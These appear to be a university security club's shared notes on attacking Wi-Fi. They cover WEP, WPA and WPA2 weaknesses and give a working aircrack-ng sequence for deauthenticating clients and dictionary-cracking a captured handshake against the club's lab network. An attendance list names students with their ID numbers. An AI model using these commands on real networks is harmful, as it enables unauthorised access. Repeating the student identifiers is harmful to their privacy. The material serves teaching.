108 第六次社課 === ###### tags: `1081` :::success 簽到表 B073040047 楊志璿 B083040036 蔡明霖 B083040037 黃琮閔 B083011026 蘇彥龍 B083011023 陳又𩑹 B063012054 林祐安 B083040021 嚴宇同 M063040085 謝承翰 M083140001 張郢展 M084020044 林聖豪 B053040011 劉其萱 B083040014 陳昱維 M063040019 劉育錡 B083040045 李亦晴 B063040059 陳縵欣 B083040025 蔡苡暄 B073040050 翁昌閔 ::: :::warning 請先安裝 Aircrack-ng: https://www.aircrack-ng.org/downloads.html ::: Wireless attacks === - 講者: 謝承翰 - [投影片下載點這邊](https://drive.google.com/file/d/1aSqsAsyDZ7b-jqRwemPyadU2JL0RlH24/view?usp=sharing) <iframe src="https://drive.google.com/file/d/1aSqsAsyDZ7b-jqRwemPyadU2JL0RlH24/preview" width="640" height="480"></iframe> 也可以參考此投影片,下下週會再玩一次(WPA2) [SCC_ppt](https://docs.google.com/presentation/d/1AkBYZCJw4KTC4DaPQFqPLfS2IL_4NnICuwRQrEClROU/edit?usp=sharing) # 社課共同筆記 ## Wi-Fi 安全協議 1. WEP > 出現:1999 / 破解:2001 / 結束:2004 - 算法: 1. `IV`( Initialization Vector,為隨機值)+`Key`(固定,類似雙方共有的密鑰)=`seed` * `IV`:24-bit 大小 2. RC4(`seed`)=`keystream` 3. `keystream(K)` $\oplus$ `plaintext(P)` = `ciphertext(C)` 4. 將`ciphertext(C)`和`IV`一起送出 - 漏洞: - 將明文 P 給 RC4,得到密文 C,拿 P 跟 C 做 $\oplus$,就可以得到金鑰 K (應該?) - 使用 CRC-32 來檢查資料的正確性,容易造出假封包 - 擷取ARP Request,並不斷重新傳給AP,由於沒有計數器,AP會不斷回傳ARP Reply,由於回覆封包有固定格式(幾乎都是已知),因此可以使用統計的結果來破解 - What is ARP? - [Address Resolution Protocol](https://zh.wikipedia.org/wiki/%E5%9C%B0%E5%9D%80%E8%A7%A3%E6%9E%90%E5%8D%8F%E8%AE%AE) - ARP 封包長得像這樣 ![img](https://i.imgur.com/fuRoRfO.png) >[name=NexcomIn] ARP Request: 誰是 192.168.1.23? > >[name=Advantec] ARP Reply: 他是 00:d0:c9:f8:b5:3f - 2. WPA > 出現:2003 / 破解:2009 - 改變: - 產生`keystream(K)`方式:RC4 -> TKIP - 檢查碼:CRC-32 -> MIC (可以順便檢驗SSID,類似簽章) - `IV`長度:48-bit - 不允許相同IV使用多次 (ARP Request攻擊法無效) * 使用改良過的RC4加密演算法 => TKIP所規範 * 改良的部分:`IV` 值的長度,從原先的 24-bit 改成 48-bit,來增加破解的困難度 * 攻擊: - 由於只有在最初認證時,才會使用Master Key做加密,其餘封包皆使用不同的`keystream(K)`做通訊 - 不斷嘗試連線,即可取得大量使用Master Key加密的封包 3. WPA2 > 出現:2004 / 破解:2017(有漏洞的部分) - 改變: - 產生`keystream(K)`方式:TKIP -> AES - 檢查碼:MIC -> CCMP * 使用 AES 加密演算法 ## How to crack? > - [Windows Crack教學](https://www.youtube.com/watch?v=EwzBhlDFwtw) * 影片上的教學下載連結若非作者(或非開源)的網站或是官方,建議還是不要任意下載~ * 不明來源的連結不能保證不會中毒 > - [疑似MacOSX Crack教學?!](https://martinsjean256.wordpress.com/2018/02/12/hacking-aircrack-ng-on-mac-cracking-wi-fi-without-kali-in-parallels/) > - Kali 內建密碼檔位置: /usr/share/wordlists/rockyou.txt.gz (前面加上"gzip -d"進行解壓縮就可以拿到裡面的“rockyou.txt”密碼檔) --- ```bash= airmon-ng start wlan0 # 啟動並監聽網路介面卡 airodump-ng mon0 # 掃描當前wifi airodump-ng -c 11 --bssid 11:22:33:44:55:66 -w output_file_log mon0 # 選擇要攻擊的wifi與監聽與紀錄其傳輸內容(這一行打完就先不要關閉,讓他持續運行與紀錄直到下一步驟完成) aireplay-ng -0 10 -a 11:22:33:44:55:66 --ignore-negative-one mon0 # 不斷送出攻擊封包 AP的MAC address (這一行請新開一個terminal來輸入指令,攻擊完成後就可以將上一部的terminal做停止Ctrl+c) aircrack-ng -w rockyou.txt output_file_log.cap #指定密碼本路徑與cap檔路徑後執行進行暴力破解 ``` > [aireplay參數說明](http://atic-tw.blogspot.com/2014/01/aireplay-ng6.html) --- NSYSUISC_WPA2_2 password(11 digits): ![img](https://i.imgur.com/coOUJL8.png) 路人:因為是奇函數,所以是0? >[name=SCC]不是喔~不是奇函數 --- 頁尾交流區 >[name=楊志璿]歡迎留下你的意見 >[name=陳縵欣] 我想要攻擊WiFi~~~~~~~~~ >>[name=楊志璿]來打,NSYSUISC_WPA2_2 >>[name=陳縵欣] 求教學 >>>[name=SCC] page 17 >> Kali虛擬機也掃不到嗎